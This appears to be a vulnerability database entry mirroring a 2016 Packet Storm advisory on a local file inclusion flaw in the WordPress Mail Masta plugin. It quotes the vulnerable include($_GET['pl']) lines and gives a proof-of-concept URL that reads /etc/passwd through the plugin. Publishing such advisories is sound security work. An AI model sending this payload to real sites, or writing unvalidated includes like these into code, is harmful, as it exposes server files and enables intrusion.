Lucene search
K

WordPress Mail Master 1.0 Local File Inclusion

🗓️ 23 Aug 2016 00:00:00Reported by Guillermo Garcia MarcosType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 42 Views

WordPress Mail Master 1.0 Local File Inclusion vulnerability in mail masta plugi

Code
`[+] Date: [23-8-2016]  
[+] Autor Guillermo Garcia Marcos   
[+] Vendor: https://downloads.wordpress.org/plugin/mail-masta.zip  
[+] Title: Mail Masta WP Local File Inclusion  
[+] info: Local File Inclusion   
  
The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.  
  
Source: /inc/campaign/count_of_send.php  
Line 4: include($_GET['pl']);  
  
Source: /inc/lists/csvexport.php:  
Line 5: include($_GET['pl']);  
  
Source: /inc/campaign/count_of_send.php  
Line 4: include($_GET['pl']);  
  
Source: /inc/lists/csvexport.php  
Line 5: include($_GET['pl']);  
  
Source: /inc/campaign/count_of_send.php  
Line 4: include($_GET['pl']);  
  
  
This looks as a perfect place to try for LFI. If an attacker is lucky enough, and instead of selecting the appropriate page from the array by its name, the script directly includes the input parameter, it is possible to include arbitrary files on the server.  
  
  
Typical proof-of-concept would be to load passwd file:  
  
  
http://megacorp/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation